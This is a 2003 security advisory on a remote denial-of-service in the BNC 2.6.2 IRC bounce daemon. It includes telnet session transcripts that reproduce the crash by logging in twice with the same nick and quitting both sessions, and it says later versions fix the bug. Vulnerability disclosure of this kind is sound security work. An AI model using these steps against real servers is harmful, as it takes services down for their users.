vulnerabilities ------------------------------------------------------------------------ 2003-05-26 BNC <= 2.6.2 DoS Rosiello Security & DTORS Security ADVISORY http://www.rosiello.org Denial of Service in bnc 2.6.2 February, 2003 I. BACKGROUND BNC which is a acro for BouNCe is a daemon designed to allow some people who do not have access to the net in general, but who do have access to another pc that can reach the net, the ability to BouNCe though this pc to IRC. BNC also satisfies as a host to allow users to Bounce through shells to IRC thus allowing for many features such as an interresting internet address commonly used for show or for benifits such as mild protection from commonly used attacks such as DoS by covering a users real IP with that IP of a machine more capable of handling these attacks. II. DESCRIPTION It is possible, for an user of the program, killing remotely the daemon, but not executing arbitrary code. III. ANALYSIS Exploitation can provide the exit() of the program as follows. Load two telnet sessions. FISRT SESSION: [angelo@rosiello.org]$ telnet 127.0.0.1 32986 Trying 127.0.0.1... Connected to 127.0.0.1. Escape character is '^]'. user first first first first nick boom ~ NOTICE AUTH :You need to say /quote PASS PASS temp123 NOTICE AUTH :Welcome to BNC v2.6.2, the irc proxy NOTICE AUTH :Level two, lets connect to something real now NOTICE AUTH :type /quote conn [server] to connect NOTICE AUTH :type /quote help for basic list of commands and usage SECOND SESSION: [angelo@rosiello.org]$ telnet 127.0.0.1 32986 Trying 127.0.0.1... Connected to 127.0.0.1. Escape character is '^]'. user second second second second nick boom NOTICE AUTH :You need to say /quote PASS PASS temp123 NOTICE AUTH :Welcome to BNC v2.6.2, the irc proxy NOTICE AUTH :Level two, lets connect to something real now NOTICE AUTH :type /quote conn [server] to connect NOTICE AUTH :type /quote help for basic list of commands and usage quit Connection closed by foreign host. NOW close the first session too... quit.. (gdb)Program exited with code 010. The password must be the right one! (the user must be real). The daemon will die. IV. DETECTION bnc2.6.2 is vulnerable, latest versions are not. The manteiner of the project was advised and He granted that the bug was fixed in the latest versions. VIII. CREDIT Angelo Rosiello http://www.rosiello.org http://www.dtors.net Software: